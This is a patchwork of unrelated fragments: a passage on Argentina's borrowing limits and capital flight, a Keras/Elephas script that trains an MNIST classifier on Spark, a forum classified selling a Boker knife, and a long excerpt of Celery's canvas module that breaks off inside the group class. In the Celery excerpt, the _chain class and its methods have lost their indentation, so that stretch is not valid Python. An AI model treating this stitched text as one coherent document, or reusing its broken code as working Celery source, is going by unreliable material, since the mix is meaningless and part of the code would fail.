In that context, it is easier to see why Argentina’s government has been acting so aggressively. Argentina’s government is very limited in how much it can borrow from abroad, after devaluing the peso at the height of its last major economic crisis in 2001.
Foreign investment in the country is falling, while capital is leaving in a steady stream as wealthy Argentineans invest elsewhere.
|
from tensorflow.keras.datasets import mnist
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Dropout, Activation
from tensorflow.keras.optimizers import SGD
from tensorflow.keras.utils import to_categorical
from elephas.spark_model import SparkModel
from elephas.utils.rdd_utils import to_simple_rdd
from pyspark import SparkContext, SparkConf
# Define basic parameters
batch_size = 64
nb_classes = 10
epochs = 1

# Create Spark context (local mode, 8 worker threads)
conf = SparkConf().setAppName('Mnist_Spark_MLP').setMaster('local[8]')
sc = SparkContext(conf=conf)

# Load MNIST and flatten each 28x28 image into a 784-dim float vector
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train = x_train.reshape(60000, 784)
x_test = x_test.reshape(10000, 784)
x_train = x_train.astype("float32")
x_test = x_test.astype("float32")
# Scale pixel values from [0, 255] into [0, 1]
x_train /= 255
x_test /= 255
print(x_train.shape[0], 'train samples')
print(x_test.shape[0], 'test samples')

# Convert class vectors to binary class matrices (one-hot encoding)
y_train = to_categorical(y_train, nb_classes)
y_test = to_categorical(y_test, nb_classes)

# Simple MLP: two hidden ReLU layers with dropout, softmax output
model = Sequential()
model.add(Dense(128, input_dim=784))
model.add(Activation('relu'))
model.add(Dropout(0.2))
model.add(Dense(128))
model.add(Activation('relu'))
model.add(Dropout(0.2))
model.add(Dense(10))
model.add(Activation('softmax'))

# Use `learning_rate` — the `lr` argument is a deprecated alias in tf.keras
sgd = SGD(learning_rate=0.1)
model.compile(sgd, 'categorical_crossentropy', ['acc'])

# Build RDD from numpy features and labels
rdd = to_simple_rdd(sc, x_train, y_train)

# Initialize SparkModel from tensorflow.keras model and Spark context
spark_model = SparkModel(model, mode='asynchronous')

# Train Spark model (workers train asynchronously; 10% held out for validation)
spark_model.fit(rdd, epochs=epochs, batch_size=batch_size, verbose=2, validation_split=0.1)

# Evaluate Spark model by evaluating the underlying model
score = spark_model.evaluate(x_test, y_test, verbose=2)
print('Test accuracy:', score[1])
|
Discussion in 'Canada' started by rexromic, Nov 4, 2018.
Boker Cox Anso, limited and numbered, used very lightly a few times. Slipjoint, blade is 2.7", N690 Bohler steel, Titanium and Red Micarta scales. Great shape and EDC blade. Made in Solingen, Germany.
Shipping included, PayPal goods or EMT. No trades.
|
# -*- coding: utf-8 -*-
"""Composing task work-flows.
.. seealso:
You should import these from :mod:`celery` and not this module.
"""
from __future__ import absolute_import, unicode_literals
import itertools
import operator
import sys
from collections import MutableSequence, deque
from copy import deepcopy
from functools import partial as _partial, reduce
from operator import itemgetter
from kombu.utils.functional import fxrange, reprcall
from kombu.utils.objects import cached_property
from kombu.utils.uuid import uuid
from vine import barrier
from celery._state import current_app
from celery.five import python_2_unicode_compatible
from celery.local import try_import
from celery.result import GroupResult
from celery.utils import abstract
from celery.utils.functional import (
maybe_list, is_list, _regen, regen, chunks as _chunks,
seq_concat_seq, seq_concat_item,
)
from celery.utils.objects import getitem_property
from celery.utils.text import truncate, remove_repeating_from_task
# Public API of this module.
__all__ = [
    'Signature', 'chain', 'xmap', 'xstarmap', 'chunks',
    'group', 'chord', 'signature', 'maybe_signature',
]

# True when running on Python 3.
PY3 = sys.version_info[0] == 3

# json in Python 2.7 borks if dict contains byte keys.
JSON_NEEDS_UNICODE_KEYS = PY3 and not try_import('simplejson')
def maybe_unroll_group(g):
    """Return the sole task of *g* if the group has exactly one member.

    Any other group (or one whose size cannot be determined) is
    returned unchanged.  See Issue #1656.
    """
    tasks = g.tasks
    try:
        size = len(tasks)
    except TypeError:
        # Lazily generated tasks: fall back to the iterator's length hint.
        hint = getattr(tasks, '__length_hint__', None)
        if hint is None:
            return g
        try:
            size = hint()
        except TypeError:
            return g
        # Materialize before indexing, since generators don't support it.
        return list(tasks)[0] if size == 1 else g
    return tasks[0] if size == 1 else g
def task_name_from(task):
    """Return ``task.name`` when available, else *task* itself (e.g. a name string)."""
    try:
        return task.name
    except AttributeError:
        return task
def _upgrade(fields, sig):
"""Used by custom signatures in .from_dict, to keep common fields."""
sig.update(chord_size=fields.get('chord_size'))
return sig
@abstract.CallableSignature.register
@python_2_unicode_compatible
class Signature(dict):
    """Task Signature.

    Class that wraps the arguments and execution options
    for a single task invocation.

    Used as the parts in a :class:`group` and other constructs,
    or to pass tasks around as callbacks while being compatible
    with serializers with a strict type subset.

    Signatures can also be created from tasks:

    - Using the ``.signature()`` method that has the same signature
      as ``Task.apply_async``:

      .. code-block:: pycon

          >>> add.signature(args=(1,), kwargs={'kw': 2}, options={})

    - or the ``.s()`` shortcut that works for star arguments:

      .. code-block:: pycon

          >>> add.s(1, kw=2)

    - the ``.s()`` shortcut does not allow you to specify execution options
      but there's a chaining `.set` method that returns the signature:

      .. code-block:: pycon

          >>> add.s(2, 2).set(countdown=10).set(expires=30).delay()

    Note:
        You should use :func:`~celery.signature` to create new signatures.
        The ``Signature`` class is the type returned by that function and
        should be used for ``isinstance`` checks for signatures.

    See Also:
        :ref:`guide-canvas` for the complete guide.

    Arguments:
        task (Task, str): Either a task class/instance, or the name of a task.
        args (Tuple): Positional arguments to apply.
        kwargs (Dict): Keyword arguments to apply.
        options (Dict): Additional options to :meth:`Task.apply_async`.

    Note:
        If the first argument is a :class:`dict`, the other
        arguments will be ignored and the values in the dict will be used
        instead::

            >>> s = signature('tasks.add', args=(2, 2))
            >>> signature(s)
            {'task': 'tasks.add', args=(2, 2), kwargs={}, options={}}
    """

    # Registry mapping subtask_type names to Signature subclasses,
    # populated by the ``register_type`` decorator.
    TYPES = {}
    _app = _type = None

    @classmethod
    def register_type(cls, name=None):
        # Class decorator: register a Signature subclass under ``name``
        # (or its class name) so ``from_dict`` can reconstruct it.
        def _inner(subclass):
            cls.TYPES[name or subclass.__name__] = subclass
            return subclass
        return _inner

    @classmethod
    def from_dict(cls, d, app=None):
        # Rebuild a signature from its serialized dict form, dispatching
        # to the registered subclass when ``subtask_type`` is set.
        typ = d.get('subtask_type')
        if typ:
            target_cls = cls.TYPES[typ]
            if target_cls is not cls:
                return target_cls.from_dict(d, app=app)
        return Signature(d, app=app)

    def __init__(self, task=None, args=None, kwargs=None, options=None,
                 type=None, subtask_type=None, immutable=False,
                 app=None, **ex):
        self._app = app
        if isinstance(task, dict):
            super(Signature, self).__init__(task)  # works like dict(d)
        else:
            # Also supports using task class/instance instead of string name.
            try:
                task_name = task.name
            except AttributeError:
                task_name = task
            else:
                # Keep the task object around so ``.type`` avoids a registry lookup.
                self._type = task
            super(Signature, self).__init__(
                task=task_name, args=tuple(args or ()),
                kwargs=kwargs or {},
                options=dict(options or {}, **ex),
                subtask_type=subtask_type,
                immutable=immutable,
                chord_size=None,
            )

    def __call__(self, *partial_args, **partial_kwargs):
        """Call the task directly (in the current process)."""
        args, kwargs, _ = self._merge(partial_args, partial_kwargs, None)
        return self.type(*args, **kwargs)

    def delay(self, *partial_args, **partial_kwargs):
        """Shortcut to :meth:`apply_async` using star arguments."""
        return self.apply_async(partial_args, partial_kwargs)

    def apply(self, args=(), kwargs={}, **options):
        """Call task locally.

        Same as :meth:`apply_async` but executed the task inline instead
        of sending a task message.
        """
        # For callbacks: extra args are prepended to the stored args.
        args, kwargs, options = self._merge(args, kwargs, options)
        return self.type.apply(args, kwargs, **options)

    def apply_async(self, args=(), kwargs={}, route_name=None, **options):
        """Apply this task asynchronously.

        Arguments:
            args (Tuple): Partial args to be prepended to the existing args.
            kwargs (Dict): Partial kwargs to be merged with existing kwargs.
            options (Dict): Partial options to be merged
                with existing options.

        Returns:
            ~@AsyncResult: promise of future evaluation.

        See also:
            :meth:`~@Task.apply_async` and the :ref:`guide-calling` guide.
        """
        try:
            _apply = self._apply_async
        except IndexError:  # pragma: no cover
            # no tasks for chain, etc to find type
            return
        # For callbacks: extra args are prepended to the stored args.
        if args or kwargs or options:
            args, kwargs, options = self._merge(args, kwargs, options)
        else:
            args, kwargs, options = self.args, self.kwargs, self.options
        # pylint: disable=too-many-function-args
        #   Borks on this, as it's a property
        return _apply(args, kwargs, **options)

    def _merge(self, args=(), kwargs={}, options={}, force=False):
        # Merge call-time args/kwargs/options with the stored ones.
        # Immutable signatures ignore call-time args/kwargs unless forced
        # (options are still merged).
        if self.immutable and not force:
            return (self.args, self.kwargs,
                    dict(self.options, **options) if options else self.options)
        return (tuple(args) + tuple(self.args) if args else self.args,
                dict(self.kwargs, **kwargs) if kwargs else self.kwargs,
                dict(self.options, **options) if options else self.options)

    def clone(self, args=(), kwargs={}, **opts):
        """Create a copy of this signature.

        Arguments:
            args (Tuple): Partial args to be prepended to the existing args.
            kwargs (Dict): Partial kwargs to be merged with existing kwargs.
            options (Dict): Partial options to be merged with
                existing options.
        """
        # need to deepcopy options so origins links etc. is not modified.
        if args or kwargs or opts:
            args, kwargs, opts = self._merge(args, kwargs, opts)
        else:
            args, kwargs, opts = self.args, self.kwargs, self.options
        s = Signature.from_dict({'task': self.task, 'args': tuple(args),
                                 'kwargs': kwargs, 'options': deepcopy(opts),
                                 'subtask_type': self.subtask_type,
                                 'chord_size': self.chord_size,
                                 'immutable': self.immutable}, app=self._app)
        s._type = self._type
        return s
    partial = clone

    def freeze(self, _id=None, group_id=None, chord=None,
               root_id=None, parent_id=None):
        """Finalize the signature by adding a concrete task id.

        The task won't be called and you shouldn't call the signature
        twice after freezing it as that'll result in two task messages
        using the same task id.

        Returns:
            ~@AsyncResult: promise of future evaluation.
        """
        # pylint: disable=redefined-outer-name
        #   XXX chord is also a class in outer scope.
        opts = self.options
        try:
            tid = opts['task_id']
        except KeyError:
            tid = opts['task_id'] = _id or uuid()
        if root_id:
            opts['root_id'] = root_id
        if parent_id:
            opts['parent_id'] = parent_id
        if 'reply_to' not in opts:
            opts['reply_to'] = self.app.oid
        if group_id:
            opts['group_id'] = group_id
        if chord:
            opts['chord'] = chord
        # pylint: disable=too-many-function-args
        #   Borks on this, as it's a property.
        return self.AsyncResult(tid)
    _freeze = freeze

    def replace(self, args=None, kwargs=None, options=None):
        """Replace the args, kwargs or options set for this signature.

        These are only replaced if the argument for the section is
        not :const:`None`.
        """
        s = self.clone()
        if args is not None:
            s.args = args
        if kwargs is not None:
            s.kwargs = kwargs
        if options is not None:
            s.options = options
        return s

    def set(self, immutable=None, **options):
        """Set arbitrary execution options (same as ``.options.update(…)``).

        Returns:
            Signature: This is a chaining method call
                (i.e., it will return ``self``).
        """
        if immutable is not None:
            self.set_immutable(immutable)
        self.options.update(options)
        return self

    def set_immutable(self, immutable):
        # Mark whether call-time args/kwargs should be ignored by ``_merge``.
        self.immutable = immutable

    def _with_list_option(self, key):
        # Return ``options[key]`` coerced to a mutable list
        # (creating it, or wrapping a scalar, as needed).
        items = self.options.setdefault(key, [])
        if not isinstance(items, MutableSequence):
            items = self.options[key] = [items]
        return items

    def append_to_list_option(self, key, value):
        # Append ``value`` to the list option ``key``, skipping duplicates.
        items = self._with_list_option(key)
        if value not in items:
            items.append(value)
        return value

    def extend_list_option(self, key, value):
        # Extend the list option ``key`` with one value or a list of values.
        items = self._with_list_option(key)
        items.extend(maybe_list(value))

    def link(self, callback):
        """Add callback task to be applied if this task succeeds.

        Returns:
            Signature: the argument passed, for chaining
                or use with :func:`~functools.reduce`.
        """
        return self.append_to_list_option('link', callback)

    def link_error(self, errback):
        """Add callback task to be applied on error in task execution.

        Returns:
            Signature: the argument passed, for chaining
                or use with :func:`~functools.reduce`.
        """
        return self.append_to_list_option('link_error', errback)

    def on_error(self, errback):
        """Version of :meth:`link_error` that supports chaining.

        on_error chains the original signature, not the errback so::

            >>> add.s(2, 2).on_error(errback.s()).delay()

        calls the ``add`` task, not the ``errback`` task, but the
        reverse is true for :meth:`link_error`.
        """
        self.link_error(errback)
        return self

    def flatten_links(self):
        """Return a recursive list of dependencies.

        "unchain" if you will, but with links intact.
        """
        return list(itertools.chain.from_iterable(itertools.chain(
            [[self]],
            (link.flatten_links()
                for link in maybe_list(self.options.get('link')) or [])
        )))

    def __or__(self, other):
        # Implements the ``sig1 | sig2`` canvas-composition operator.
        # These could be implemented in each individual class,
        # I'm sure, but for now we have this.
        if isinstance(other, chord) and len(other.tasks) == 1:
            # chord with one header -> header[0] | body
            other = other.tasks[0] | other.body

        if isinstance(self, group):
            if isinstance(other, group):
                # group() | group() -> single group
                return group(
                    itertools.chain(self.tasks, other.tasks), app=self.app)
            # group() | task -> chord
            if len(self.tasks) == 1:
                # group(ONE.s()) | other -> ONE.s() | other
                # Issue #3323
                return self.tasks[0] | other
            return chord(self, body=other, app=self._app)
        elif isinstance(other, group):
            # unroll group with one member
            other = maybe_unroll_group(other)
            if isinstance(self, _chain):
                # chain | group() -> chain
                sig = self.clone()
                sig.tasks.append(other)
                return sig
            # task | group() -> chain
            return _chain(self, other, app=self.app)

        if not isinstance(self, _chain) and isinstance(other, _chain):
            # task | chain -> chain
            return _chain(
                seq_concat_seq((self,), other.tasks), app=self._app)
        elif isinstance(other, _chain):
            # chain | chain -> chain
            sig = self.clone()
            if isinstance(sig.tasks, tuple):  # aaaargh
                sig.tasks = list(sig.tasks)
            sig.tasks.extend(other.tasks)
            return sig
        elif isinstance(self, chord):
            # chord(ONE, body) | other -> ONE | body | other
            # chord with one header task is unnecessary.
            if len(self.tasks) == 1:
                return self.tasks[0] | self.body | other
            # chord | task -> attach to body
            sig = self.clone()
            sig.body = sig.body | other
            return sig
        elif isinstance(other, Signature):
            if isinstance(self, _chain):
                if isinstance(self.tasks[-1], group):
                    # CHAIN [last item is group] | TASK -> chord
                    sig = self.clone()
                    sig.tasks[-1] = chord(
                        sig.tasks[-1], other, app=self._app)
                    return sig
                elif isinstance(self.tasks[-1], chord):
                    # CHAIN [last item is chord] -> chain with chord body.
                    sig = self.clone()
                    sig.tasks[-1].body = sig.tasks[-1].body | other
                    return sig
                else:
                    # chain | task -> chain
                    return _chain(
                        seq_concat_item(self.tasks, other), app=self._app)
            # task | task -> chain
            return _chain(self, other, app=self._app)
        return NotImplemented

    def election(self):
        # Broadcast a leader-election round for this task id over the
        # control channel; returns the AsyncResult for the elected id.
        type = self.type
        app = type.app
        tid = self.options.get('task_id') or uuid()

        with app.producer_or_acquire(None) as P:
            props = type.backend.on_task_call(P, tid)
            app.control.election(tid, 'task', self.clone(task_id=tid, **props),
                                 connection=P.connection)
            return type.AsyncResult(tid)

    def reprcall(self, *args, **kwargs):
        # Human-readable ``name(args, kwargs)`` representation;
        # ``force=True`` merges even for immutable signatures.
        args, kwargs, _ = self._merge(args, kwargs, {}, force=True)
        return reprcall(self['task'], args, kwargs)

    def __deepcopy__(self, memo):
        # NOTE(review): returns a plain dict copy rather than a Signature,
        # and does not copy nested values — presumably intentional; confirm
        # before relying on deepcopy semantics here.
        memo[id(self)] = self
        return dict(self)

    def __invert__(self):
        # ``~sig`` shortcut: apply asynchronously and block for the result.
        return self.apply_async().get()

    def __reduce__(self):
        # for serialization, the task type is lazily loaded,
        # and not stored in the dict itself.
        return signature, (dict(self),)

    def __json__(self):
        return dict(self)

    def __repr__(self):
        return self.reprcall()

    if JSON_NEEDS_UNICODE_KEYS:  # pragma: no cover
        def items(self):
            # Decode byte keys so Python 2.7's json can serialize us.
            for k, v in dict.items(self):
                yield k.decode() if isinstance(k, bytes) else k, v

    @property
    def name(self):
        # for duck typing compatibility with Task.name
        return self.task

    @cached_property
    def type(self):
        # The task object: either the one given at construction time,
        # or looked up in the app's task registry by name.
        return self._type or self.app.tasks[self['task']]

    @cached_property
    def app(self):
        # Bound app, falling back to the current default app.
        return self._app or current_app

    @cached_property
    def AsyncResult(self):
        try:
            return self.type.AsyncResult
        except KeyError:  # task not registered
            return self.app.AsyncResult

    @cached_property
    def _apply_async(self):
        try:
            return self.type.apply_async
        except KeyError:
            # Task not registered locally: send by name instead.
            return _partial(self.app.send_task, self['task'])

    # Dict-backed attribute access for the signature's fields.
    id = getitem_property('options.task_id', 'Task UUID')
    parent_id = getitem_property('options.parent_id', 'Task parent UUID.')
    root_id = getitem_property('options.root_id', 'Task root UUID.')
    task = getitem_property('task', 'Name of task.')
    args = getitem_property('args', 'Positional arguments to task.')
    kwargs = getitem_property('kwargs', 'Keyword arguments to task.')
    options = getitem_property('options', 'Task execution options.')
    subtask_type = getitem_property('subtask_type', 'Type of signature')
    chord_size = getitem_property(
        'chord_size', 'Size of chord (if applicable)')
    immutable = getitem_property(
        'immutable', 'Flag set if no longer accepts new arguments')
@Signature.register_type(name='chain')
@python_2_unicode_compatible
class _chain(Signature):
tasks = getitem_property('kwargs.tasks', 'Tasks in chain.')
@classmethod
def from_dict(cls, d, app=None):
    # Rebuild a chain from its serialized dict form.
    tasks = d['kwargs']['tasks']
    if tasks:
        if isinstance(tasks, tuple):  # aaaargh
            tasks = d['kwargs']['tasks'] = list(tasks)
        # First task must be signature object to get app
        tasks[0] = maybe_signature(tasks[0], app=app)
    return _upgrade(d, _chain(tasks, app=app, **d['options']))
def __init__(self, *tasks, **options):
tasks = (regen(tasks[0]) if len(tasks) == 1 and is_list(tasks[0])
else tasks)
Signature.__init__(
self, 'celery.chain', (), {'tasks': tasks}, **options
)
self._use_link = options.pop('use_link', None)
self.subtask_type = 'chain'
self._frozen = None
def __call__(self, *args, **kwargs):
if self.tasks:
return self.apply_async(args, kwargs)
def clone(self, *args, **kwargs):
to_signature = maybe_signature
s = Signature.clone(self, *args, **kwargs)
s.kwargs['tasks'] = [
to_signature(sig, app=self._app, clone=True)
for sig in s.kwargs['tasks']
]
return s
def apply_async(self, args=(), kwargs={}, **options):
# python is best at unpacking kwargs, so .run is here to do that.
app = self.app
if app.conf.task_always_eager:
return self.apply(args, kwargs, **options)
return self.run(args, kwargs, app=app, **(
dict(self.options, **options) if options else self.options))
def run(self, args=(), kwargs={}, group_id=None, chord=None,
task_id=None, link=None, link_error=None, publisher=None,
producer=None, root_id=None, parent_id=None, app=None, **options):
# pylint: disable=redefined-outer-name
# XXX chord is also a class in outer scope.
app = app or self.app
use_link = self._use_link
if use_link is None and app.conf.task_protocol == 1:
use_link = True
args = (tuple(args) + tuple(self.args)
if args and not self.immutable else self.args)
if self._frozen:
tasks, results = self._frozen
else:
tasks, results = self.prepare_steps(
args, self.tasks, root_id, parent_id, link_error, app,
task_id, group_id, chord,
)
if results:
if link:
tasks[0].extend_list_option('link', link)
first_task = tasks.pop()
# chain option may already be set, resulting in
# "multiple values for keyword argument 'chain'" error.
# Issue #3379.
options['chain'] = tasks if not use_link else None
first_task.apply_async(**options)
return results[0]
def freeze(self, _id=None, group_id=None, chord=None,
root_id=None, parent_id=None):
# pylint: disable=redefined-outer-name
# XXX chord is also a class in outer scope.
_, results = self._frozen = self.prepare_steps(
self.args, self.tasks, root_id, parent_id, None,
self.app, _id, group_id, chord, clone=False,
)
return results[0]
def prepare_steps(self, args, tasks,
root_id=None, parent_id=None, link_error=None, app=None,
last_task_id=None, group_id=None, chord_body=None,
clone=True, from_dict=Signature.from_dict):
app = app or self.app
# use chain message field for protocol 2 and later.
# this avoids pickle blowing the stack on the recursion
# required by linking task together in a tree structure.
# (why is pickle using recursion? or better yet why cannot python
# do tail call optimization making recursion actually useful?)
use_link = self._use_link
if use_link is None and app.conf.task_protocol == 1:
use_link = True
steps = deque(tasks)
steps_pop = steps.pop
steps_extend = steps.extend
prev_task = None
prev_res = None
tasks, results = [], []
i = 0
# NOTE: We are doing this in reverse order.
# The result is a list of tasks in reverse order, that is
# passed as the ``chain`` message field.
# As it's reversed the worker can just do ``chain.pop()`` to
# get the next task in the chain.
while steps:
task = steps_pop()
is_first_task, is_last_task = not steps, not i
if not isinstance(task, abstract.CallableSignature):
task = from_dict(task, app=app)
if isinstance(task, group):
task = maybe_unroll_group(task)
# first task gets partial args from chain
if clone:
task = task.clone(args) if is_first_task else task.clone()
elif is_first_task:
task.args = tuple(args) + tuple(task.args)
if isinstance(task, _chain):
# splice the chain
steps_extend(task.tasks)
continue
if isinstance(task, group) and prev_task:
# automatically upgrade group(...) | s to chord(group, s)
# for chords we freeze by pretending it's a normal
# signature instead of a group.
tasks.pop()
results.pop()
task = chord(
task, body=prev_task,
task_id=prev_res.task_id, root_id=root_id, app=app,
)
if is_last_task:
# chain(task_id=id) means task id is set for the last task
# in the chain. If the chord is part of a chord/group
# then that chord/group must synchronize based on the
# last task in the chain, so we only set the group_id and
# chord callback for the last task.
res = task.freeze(
last_task_id,
root_id=root_id, group_id=group_id, chord=chord_body,
)
else:
res = task.freeze(root_id=root_id)
i += 1
if prev_task:
if use_link:
# link previous task to this task.
task.link(prev_task)
if prev_res and not prev_res.parent:
prev_res.parent = res
if link_error:
for errback in maybe_list(link_error):
task.link_error(errback)
tasks.append(task)
results.append(res)
prev_task, prev_res = task, res
if isinstance(task, chord):
app.backend.ensure_chords_allowed()
# If the task is a chord, and the body is a chain
# the chain has already been prepared, and res is
# set to the last task in the callback chain.
# We need to change that so that it points to the
# group result object.
node = res
while node.parent:
node = node.parent
prev_res = node
return tasks, results
def apply(self, args=(), kwargs={}, **options):
last, fargs = None, args
for task in self.tasks:
res = task.clone(fargs).apply(
last and (last.get(),), **dict(self.options, **options))
res.parent, last, fargs = last, res, None
return last
@property
def app(self):
app = self._app
if app is None:
try:
app = self.tasks[0]._app
except LookupError:
pass
return app or current_app
def __repr__(self):
if not self.tasks:
return '<{0}@{1:#x}: empty>'.format(
type(self).__name__, id(self))
return remove_repeating_from_task(
self.tasks[0]['task'],
' | '.join(repr(t) for t in self.tasks))
class chain(_chain):
    """Chain tasks together.

    Each task follows one another,
    by being applied as a callback of the previous task.

    Note:
        If called with only one argument, then that argument must
        be an iterable of tasks to chain: this allows us
        to use generator expressions.

    Example:
        This is effectively :math:`((2 + 2) + 4)`:

        .. code-block:: pycon

            >>> res = chain(add.s(2, 2), add.s(4))()
            >>> res.get()
            8

        Calling a chain will return the result of the last task in the chain.
        You can get to the other tasks by following the ``result.parent``'s:

        .. code-block:: pycon

            >>> res.parent.get()
            4

        Using a generator expression:

        .. code-block:: pycon

            >>> lazy_chain = chain(add.s(i) for i in range(10))
            >>> res = lazy_chain(3)

    Arguments:
        *tasks (Signature): List of task signatures to chain.
            If only one argument is passed and that argument is
            an iterable, then that'll be used as the list of signatures
            to chain instead.  This means that you can use a generator
            expression.

    Returns:
        ~celery.chain: A lazy signature that can be called to apply the first
            task in the chain.  When that task succeeds the next task in the
            chain is applied, and so on.
    """

    # could be function, but must be able to reference as :class:`chain`.
    def __new__(cls, *tasks, **kwargs):
        # This forces `chain(X, Y, Z)` to work the same way as `X | Y | Z`
        if not kwargs and tasks:
            if len(tasks) == 1 and is_list(tasks[0]):
                # ensure chain(generator_expression) works.
                tasks = tasks[0]
            return reduce(operator.or_, tasks)
        return super(chain, cls).__new__(cls, *tasks, **kwargs)
class _basemap(Signature):
    """Shared implementation for the xmap/xstarmap signature types."""

    # Name of the built-in task that performs the mapping (set by subclass).
    _task_name = None
    _unpack_args = itemgetter('task', 'it')

    @classmethod
    def from_dict(cls, d, app=None):
        return _upgrade(
            d, cls(*cls._unpack_args(d['kwargs']), app=app, **d['options']),
        )

    def __init__(self, task, it, **options):
        Signature.__init__(
            self, self._task_name, (),
            {'task': task, 'it': regen(it)}, immutable=True, **options
        )

    def apply_async(self, args=(), kwargs={}, **opts):
        # need to evaluate generators
        task, it = self._unpack_args(self.kwargs)
        return self.type.apply_async(
            (), {'task': task, 'it': list(it)},
            route_name=task_name_from(self.kwargs.get('task')), **opts
        )
@Signature.register_type()
@python_2_unicode_compatible
class xmap(_basemap):
    """Map operation for tasks.

    Note:
        Tasks executed sequentially in process, this is not a
        parallel operation like :class:`group`.
    """

    _task_name = 'celery.map'

    def __repr__(self):
        # Rendered like a Python list comprehension for readability.
        task, it = self._unpack_args(self.kwargs)
        return '[{0}(x) for x in {1}]'.format(
            task.task, truncate(repr(it), 100))
@Signature.register_type()
@python_2_unicode_compatible
class xstarmap(_basemap):
    """Map operation for tasks, using star arguments."""

    _task_name = 'celery.starmap'

    def __repr__(self):
        # Rendered like a star-args list comprehension for readability.
        task, it = self._unpack_args(self.kwargs)
        return '[{0}(*x) for x in {1}]'.format(
            task.task, truncate(repr(it), 100))
@Signature.register_type()
class chunks(Signature):
    """Partition of tasks in n chunks."""

    _unpack_args = itemgetter('task', 'it', 'n')

    @classmethod
    def from_dict(cls, d, app=None):
        return _upgrade(
            d, chunks(*cls._unpack_args(
                d['kwargs']), app=app, **d['options']),
        )

    def __init__(self, task, it, n, **options):
        Signature.__init__(
            self, 'celery.chunks', (),
            {'task': task, 'it': regen(it), 'n': n},
            immutable=True, **options
        )

    def __call__(self, **options):
        return self.apply_async(**options)

    def apply_async(self, args=(), kwargs={}, **opts):
        # Delegates to a group of xstarmap signatures, one per chunk.
        return self.group().apply_async(
            args, kwargs,
            route_name=task_name_from(self.kwargs.get('task')), **opts
        )

    def group(self):
        # need to evaluate generators
        task, it, n = self._unpack_args(self.kwargs)
        return group((xstarmap(task, part, app=self._app)
                      for part in _chunks(iter(it), n)),
                     app=self._app)

    @classmethod
    def apply_chunks(cls, task, it, n, app=None):
        # Convenience: build the chunks signature and apply it immediately.
        return cls(task, it, n, app=app)()
def _maybe_group(tasks, app):
    """Normalize *tasks* into a flat list of signatures.

    Accepts a serialized dict, a group/chain, a single signature,
    or an iterable of (possibly serialized) signatures.
    """
    if isinstance(tasks, dict):
        # Serialized signature: upgrade to a real Signature first.
        tasks = signature(tasks, app=app)
    if isinstance(tasks, (group, _chain)):
        return tasks.tasks
    if isinstance(tasks, abstract.CallableSignature):
        return [tasks]
    return [signature(t, app=app) for t in tasks]
@Signature.register_type()
@python_2_unicode_compatible
class group(Signature):
    """Creates a group of tasks to be executed in parallel.

    A group is lazy so you must call it to take action and evaluate
    the group.

    Note:
        If only one argument is passed, and that argument is an iterable
        then that'll be used as the list of tasks instead: this
        allows us to use ``group`` with generator expressions.

    Example:
        >>> lazy_group = group([add.s(2, 2), add.s(4, 4)])
        >>> promise = lazy_group()  # <-- evaluate: returns lazy result.
        >>> promise.get()  # <-- will wait for the task to return
        [4, 8]

    Arguments:
        *tasks (Signature): A list of signatures that this group will call.
            If there's only one argument, and that argument is an iterable,
            then that'll define the list of signatures instead.
        **options (Any): Execution options applied to all tasks
            in the group.

    Returns:
        ~celery.group: signature that when called will then call all of the
            tasks in the group (and return a :class:`GroupResult` instance
            that can be used to inspect the state of the group).
    """

    tasks = getitem_property('kwargs.tasks', 'Tasks in group.')

    @classmethod
    def from_dict(cls, d, app=None):
        # Rebuild a group from its serialized (dict) representation.
        return _upgrade(
            d, group(d['kwargs']['tasks'], app=app, **d['options']),
        )

    def __init__(self, *tasks, **options):
        if len(tasks) == 1:
            tasks = tasks[0]
            if isinstance(tasks, group):
                tasks = tasks.tasks
            if not isinstance(tasks, _regen):
                # regen allows consuming a generator more than once.
                tasks = regen(tasks)
        Signature.__init__(
            self, 'celery.group', (), {'tasks': tasks}, **options
        )
        self.subtask_type = 'group'

    def __call__(self, *partial_args, **options):
        return self.apply_async(partial_args, **options)

    def skew(self, start=1.0, stop=None, step=1.0):
        # Stagger task start times by assigning increasing countdowns.
        it = fxrange(start, stop, step, repeatlast=True)
        for task in self.tasks:
            task.set(countdown=next(it))
        return self

    def apply_async(self, args=(), kwargs=None, add_to_parent=True,
                    producer=None, link=None, link_error=None, **options):
        if link is not None:
            raise TypeError('Cannot add link to group: use a chord')
        if link_error is not None:
            raise TypeError(
                'Cannot add link to group: do that on individual tasks')
        app = self.app
        if app.conf.task_always_eager:
            return self.apply(args, kwargs, **options)
        if not self.tasks:
            return self.freeze()
        options, group_id, root_id = self._freeze_gid(options)
        tasks = self._prepared(self.tasks, [], group_id, root_id, app)
        p = barrier()
        results = list(self._apply_tasks(tasks, producer, app, p,
                                         args=args, kwargs=kwargs, **options))
        result = self.app.GroupResult(group_id, results, ready_barrier=p)
        p.finalize()

        # - Special case of group(A.s() | group(B.s(), C.s()))
        #   That is, group with single item that's a chain but the
        #   last task in that chain is a group.
        #
        #   We cannot actually support arbitrary GroupResults in chains,
        #   but this special case we can.
        if len(result) == 1 and isinstance(result[0], GroupResult):
            result = result[0]

        parent_task = app.current_worker_task
        if add_to_parent and parent_task:
            parent_task.add_trail(result)
        return result

    def apply(self, args=(), kwargs={}, **options):
        # Eager (local) execution of every member task.
        app = self.app
        if not self.tasks:
            return self.freeze()  # empty group returns GroupResult
        options, group_id, root_id = self._freeze_gid(options)
        tasks = self._prepared(self.tasks, [], group_id, root_id, app)
        return app.GroupResult(group_id, [
            sig.apply(args=args, kwargs=kwargs, **options) for sig, _ in tasks
        ])

    def set_immutable(self, immutable):
        for task in self.tasks:
            task.set_immutable(immutable)

    def link(self, sig):
        # Simply link to first task
        sig = sig.clone().set(immutable=True)
        return self.tasks[0].link(sig)

    def link_error(self, sig):
        sig = sig.clone().set(immutable=True)
        return self.tasks[0].link_error(sig)

    def _prepared(self, tasks, partial_args, group_id, root_id, app,
                  CallableSignature=abstract.CallableSignature,
                  from_dict=Signature.from_dict,
                  isinstance=isinstance, tuple=tuple):
        # Yields (task, frozen_result) pairs, flattening nested groups.
        for task in tasks:
            if isinstance(task, CallableSignature):
                # local sigs are always of type Signature, and we
                # clone them to make sure we don't modify the originals.
                task = task.clone()
            else:
                # serialized sigs must be converted to Signature.
                task = from_dict(task, app=app)
            if isinstance(task, group):
                # needs yield_from :(
                unroll = task._prepared(
                    task.tasks, partial_args, group_id, root_id, app,
                )
                for taskN, resN in unroll:
                    yield taskN, resN
            else:
                if partial_args and not task.immutable:
                    task.args = tuple(partial_args) + tuple(task.args)
